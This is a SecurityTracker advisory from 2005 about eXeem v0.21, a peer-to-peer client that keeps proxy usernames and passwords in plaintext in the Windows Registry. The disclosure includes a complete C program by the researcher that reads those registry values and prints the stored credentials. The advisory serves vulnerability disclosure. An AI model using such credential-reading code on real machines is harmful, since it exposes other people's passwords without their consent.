SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (File Transfer/Sharing)  >   eXeem Vendors:   eXeem
eXeem Discloses Passwords to Local Users
SecurityTracker Alert ID:  1013266
SecurityTracker URL:  http://securitytracker.com/id/1013266
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Feb 23 2005
Impact:   Disclosure of authentication information
Exploit Included:  Yes  
Version(s): 0.21
Description:   Kozan reported a vulnerability in eXeem. A local user can obtain proxy passwords.

The software stores plaintext passwords and other configuration data in the Windows Registry. A local user can view the data.

Impact:   A local user can obtain proxy setting passwords.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.exeem.com/ (Links to External Site)
Cause:   Access control error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  eXeem v0.21 discloses passwords for proxy settings to local users.


eXeem v0.21 discloses passwords for proxy settings to local users.


---------------------
Application:
---------------------

eXeem v0.21


---------------------
Introduction:
---------------------

Vendor: www.exeem.com

Vendor Description:  eXeem™ is a brand new Peer-To-Peer program,
which is based on the BitTorrent idea. eXeem™ eliminates the need
for trackers as nodes in the program will be taking their role. eXeem™
also features easy publication of files to the network as well as a
rating and comments system. eXeem™ contains NO SPYWARE. eXeem™ is
free
and is ad-supported. eXeem™ is currently still in its beta testing phase,
which means that the network might not be completely stable yet.
You are still very welcome to give eXeem™ a try and see how it is
different from other Peer-To-Peer programs.



---------------------
Bug:
---------------------


eXeem v0.21 stores all the information and passwords in registry
in plain text format without crypting and can be viewed by a local user.


---------------------
Vendor Confirmed:
---------------------
No.


---------------------
Fix:
---------------------
There is no solution at the time of this entry.



---------------------
Exploit:
---------------------


/*****************************************************************

eXeem v0.21 Local Exploit by Kozan

Application: eXeem v0.21
Vendor: www.exeem.com
Vulnerable Description: eXeem v0.21 discloses passwords
for proxy settings to local users.


Discovered & Coded by: Kozan
Credits to ATmaCA
Web : www.netmagister.com
Web2: www.spyinstructors.com
Mail: kozan[at]netmagister[dot]com


*****************************************************************/

#include <stdio.h>
#include <windows.h>


#define BUFSIZE 100
HKEY hKey;
char proxy_ip[BUFSIZE],
	 proxy_username[BUFSIZE],
	 proxy_password[BUFSIZE];

DWORD dwBufLen=BUFSIZE;
LONG lRet;



int main()
{

	if(RegOpenKeyEx(HKEY_CURRENT_USER, "Software\\Exeem",
                                        0,
                                        KEY_QUERY_VALUE,
                                        &hKey) == ERROR_SUCCESS)
    {

		lRet = RegQueryValueEx( hKey, "proxy_ip", NULL, NULL,
						       (LPBYTE) proxy_ip, &dwBufLen);

                        if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){
                                 RegCloseKey(hKey);
                                 printf("An error occured!\n");
                                 return 0;
                        }

		lRet = RegQueryValueEx( hKey, "proxy_username", NULL, NULL,
						       (LPBYTE) proxy_username, &dwBufLen);

                        if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){
                                 RegCloseKey(hKey);
                                 printf("An error occured!\n");
                                 return 0;
                        }

		lRet = RegQueryValueEx( hKey, "proxy_password", NULL, NULL,
						       (LPBYTE) proxy_password, &dwBufLen);

                        if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ){
                                 RegCloseKey(hKey);
                                 printf("An error occured!\n");
                                 return 0;
                        }


		RegCloseKey(hKey);

		printf("eXeem v0.21 Local Exploit by Kozan\n");
		printf("Credits to ATmaCA\n");
		printf("www.netmagister.com  -  www.spyinstructors.com \n\n");
		printf("Proxy IP           : %s\n",proxy_ip);
		printf("Proxy Username     : %s\n",proxy_username);
		printf("Proxy Password     : %s\n",proxy_password);


    }
	else
	{
        printf("eXeem v0.21 is not installed on your pc!\n");
    }

	return 0;
}




Kozan...
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC